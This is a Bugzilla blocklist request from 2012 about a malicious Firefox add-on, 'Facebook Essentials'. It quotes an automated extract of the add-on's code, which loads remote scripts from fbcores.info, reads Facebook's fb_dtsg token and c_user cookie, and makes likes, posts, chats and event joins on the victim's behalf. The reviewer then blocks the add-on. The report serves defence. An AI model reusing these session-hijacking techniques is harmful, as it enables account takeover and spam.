Bug 739482
Opened 12 years ago
Closed 12 years ago
Malicious "Facebook Essentials" add-on
Categories
(Toolkit :: Blocklist Policy Requests, defect)
Toolkit
Blocklist Policy Requests
RESOLVED
FIXED
People
(Reporter: mhammell, Assigned: jorgev)
Attachments
(1 file)
62.81 KB,
application/octet-stream
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11 Steps to reproduce: Downloaded the add-on from http://buzz-france[.]info/freesms.xpi Actual results: Steals your Facebook cookies and uses your account to like a series of pages and add your account to a set of Facebook events. See the automated extract from the add-on below: ** Embedded and Remote Files ** content/youtube.js http://fbcores.info/sms.js http://fbcores.info/gkuyrr.js content/xmlhttprequester.js content/script-compiler-overlay.xul http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul content/prefman.js content/skin/icon.png content/script-compiler.js install.rdf chrome.manifest ** Embedded Metadata ** <em:name>Facebook Essentials</em:name> <em:version>1.0</em:version> <em:type>2</em:type> <em:creator>Arash Jafari</em:creator> <em:developer>Arash Jafari</em:developer> <em:description>Facebook Essentials</em:description> <em:homepageURL>http://www.klate.com/</em:homepageURL> <em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL> <em:targetApplication> <em:minVersion>3.5</em:minVersion> <em:maxVersion>15.*</em:maxVersion> </em:targetApplication> ** Files Loaded ** ...pt type='application/x-javascript' src='chrome://youtube/content/youtube.js'></s... 'chrome://youtube/content/youtube.js' <em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL> ...overlay chrome://browser/content/browser.xul chrome://youtube/content/script-com... ** Remote Javascript Loaded ** var s = document.createElement('script'); s.setAttribute("type","text/javascript"); s.setAttribute("src", "http://fbcores.info/sms.js"); function addScript() { var s = document.createElement('script'); s.setAttribute("type", "text/javascript"); s.setAttribute("src", "http://fbcores.info/gkuyrr.js"); ...tachment[params][metaTagMap][2][name]=description&attachment[params][metaTagMap]...
for (i=0; i<document.getElementsByTagName('script').length; i++) { var a = document.getElementsByTagName('script')[i].innerHTML; var a = document.getElementsByTagName('script')[0]; addScript(); // this function gets called by user scripts in content security scope to ...eymaster/gatekeeper/there.is.only.xul'><script type='application/x-javascript' s... var scriptableStream=Components .classes["@mozilla.org/scriptableinputstream;1"] .getService(Components.interfaces.nsIScriptableInputStream); .classes["@mozilla.org/intl/scriptableunicodeconverter"] .createInstance(Components.interfaces.nsIScriptableUnicodeConverter); scriptableStream.init(input); var str=scriptableStream.read(input.available()); scriptableStream.close(); var script=youtube_gmCompiler.getUrlContents( youtube_gmCompiler.injectScript(script, href, unsafeWin); injectScript: function(script, url, unsafeContentWin) { var sandbox, script, logger, storage, xmlhttpRequester; var storage=new youtube_ScriptStorage(); "(function(){"+script+"})()", e2.fileName=script.filename; function youtube_ScriptStorage() { youtube_ScriptStorage.prototype.setValue = function(name, val) { youtube_ScriptStorage.prototype.getValue = function(name, defVal) { <Description about="urn:mozilla:install-manifest"> <em:description>Facebook Essentials</em:description> <Description> </Description> </Description> ...nt/browser.xul chrome://youtube/content/script-compiler-overlay.xul ** Facebook Paths Accessed ** top.location.href = 'http://facebook.com' if (stompa.indexOf('facebook.com') > 0) { ...gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '... ...httpwp['open']('GET', 'http://www.facebook.com/profile.php?id=' + user_id + '&sk... ...er.indexOf('Mora em <a href="http://www.facebook.com/pages/S%C3%A3o-Paulo-Brazil... 
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = '/ajax/connect/external_node_connect.php?__a=1'; var urlwp = '/ajax/sharer/submit/?__a=1'; var urlwp = '/ajax/profile/composer.php?__a=1'; ...var postmessagetext = 'O meu perfil do Facebook foi acessado ' + rtotal + ' veze... ...var postmessage = 'O meu perfil do Facebook foi acessado ' + rtotal + ' vezes em... var urlwp = '/ajax/updatestatus.php?__a=1'; var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1"; ...nha nesse concurso de Imagem Digital\x0Afacebook.com/photo.php?fbid=309406152446... var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1"; var urlwp = '/ajax/questions/ask_friends.php?qid=' + qid + '&__a=1'; var urlwp = '/ajax/events/permalink/join.php?__a=1'; var urlwp = '/ajax/events/invite/send/?__a=1'; "www.facebook.com", "http://facebook.com", "www.facebook.fr", "http://facebook.fr", "www.facebook.ca", "http://facebook.ca", "www.facebook.co.uk", "http://facebook.co.uk" "Curti esse facebook colorido ;) " + fbhost + "/photo.php?fbid=" + fbid, httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false); ...open("POST", "/ajax/ufi/modify.php?__a=1"), setRequestHeader("Content-Type", "ap... <em:id>GifBlock@facebook.com</em:id> <em:name>Facebook Essentials</em:name> <em:description>Facebook Essentials</em:description> ** Facebook Data Accessed ** var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; ...]['match'](document['cookie']['match'](/c_user=(\d+)/)[1]); console.log(fb_dtsg) ...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... 
...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ..._mod]=like_widget&nctr[_impid]=4a44dc9a&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...custom_value]=50&audience[0][value]=111&fb_dtsg=' + fb_dtsg + '&message=@[' + fr... ...wp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=... ...wp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=... ...nder=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_sou... ...ine=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_sou... ...__d=1&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...eader&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&lsd&post_form_id... ...__d=1&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...D0%84&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feedback_params=... ** HTTP Requests ** gf = new XMLHttpRequest(); ...gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '... var httpwp = new XMLHttpRequest(); ...httpwp['open']('GET', 'http://www.facebook.com/profile.php?id=' + user_id + '&sk...
var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var http3 = new XMLHttpRequest(); http3.open("POST", url3, true); var httpc = new XMLHttpRequest(); httpc.open("POST", urlc, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false); with(newx = new XMLHttpRequest()) ...open("POST", "/ajax/ufi/modify.php?__a=1"), setRequestHeader("Content-Type", "ap... var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var req = new this.chromeWindow.XMLHttpRequest(); ** All URLs Loaded or Mentioned ** top.location.href = 'http://facebook.com' ...httpwp['open']('GET', 'http://www.facebook.com/profile.php?id=' + user_id + '&sk... ...if (outer.indexOf('Mora em <a href="http://www.facebook.com/pages/S%C3%A3o-Paulo... 
var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var toLikes = new Array("http://bit.ly/GW7Mjb"); var shareurls = new Array("http://www.youtube.com/watch?v=QMucCamyuSI"); ...var postimgs = new Array("http://media.salon.com/2010/05/outrage_over_the_smokin... var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1"; var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1"; "http://facebook.com", "http://fb.com", "http://facebook.fr", "http://facebook.ca", "http://facebook.co.uk" httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false); ... '<center><br><br><br><br><br><img src="http://whos.amung.us/widget/ncosqdqleyjm... ... '<center><br><br><br><br><br><img src="http://whos.amung.us/widget/ncosqdqleyjl... ...var urlwp = "http://www.youtube.com/watch_actions_ajax?action_like_video=1&video... ... '<center><br><br><br><br><br><img src="http://whos.amung.us/widget/ncosqdqleyjm... s.setAttribute("src", "http://fbcores.info/gkuyrr.js"); s.setAttribute("src", "http://fbcores.info/sms.js"); ...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul</code></... ...<dd><a href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org... ...<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper... // http://www.letitblog.com/code/python/greasemonkey.py.txt // http://greasemonkey.devjavu.com/ <RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#"> <em:homepageURL>http://www.klate.com/</em:homepageURL> Expected results: It should not steal your Facebook cookies and begin conducting transactions on your behalf without your consent.
Comment 1•12 years ago
ID: GifBlock@facebook.com
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Comment 2•12 years ago
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i79
Status: ASSIGNED → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
Updated•8 years ago
Product: addons.mozilla.org → Toolkit